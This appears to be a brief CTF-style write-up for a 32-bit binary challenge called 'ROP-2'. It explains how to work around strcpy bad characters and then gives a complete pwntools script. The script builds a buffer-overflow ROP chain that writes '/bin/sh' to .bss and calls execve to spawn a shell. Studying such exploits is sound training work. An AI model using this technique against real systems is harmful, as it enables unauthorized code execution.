ROP-2
This one was really tough !! the main problem here is it is using strcpy so u can't use bad chars like /x00,/x0d,/x0a,/x09 so finding gadget was very tough
and pack(0) or any single digit number wouldn't work so we have to make use of integer overflow !! we would pack(0xffffffff) first and then increment it to make it zero
NOTE: this binary takes input via command-line argument
from pwn import *
context.bits=32
adress1=0x0806fb4c # mov eax,edx ; ret
adress3=0x08052476 # pop edx
adress4=0x0805249d # pop ecx,ebx
adress6=0x08052476 # pop edx
adress5=0x08078e71 # mov dword[edx],eax
adress8=0x08083d82 # inc eax
adress2=0x080c86db # inc ecx
adress9=0x08068973 # inc edx; or al, 0x5D ; ret ;
adressx=0x08053728 # mov eax, 0xFFFFFFFF ; ret ; ( a lucky gadget !!)
bssadress=0x80ca3e0
syscall=0x08052b9f
payload= "A"*44
payload+=pack(adress3)+"//bi" # edx='//bi'
payload+=pack(adress1) # eax='//bi'
payload+=pack(adress3)+pack(bssadress) # edx = bss
payload+=pack(adress5) # [edx]=eax
payload+=pack(adress3)+"n/sh" # edx='n/sh'
payload+=pack(adress1) # eax='n/sh'
payload+=pack(adress3)+pack(bssadress+4) # edx = bss
payload+=pack(adress5) # [edx]=eax
payload+=pack(adress6)+pack(0xffffffff)+pack(adress9) # edx=0
payload+=pack(adressx)+pack(adress8)*12 # eax=11
payload+=pack(adress4)+pack(0xffffffff)+pack(bssadress)+pack(adress2) # ecx=0,ebx=(/bin/sh)*
payload+=pack(syscall)
print payload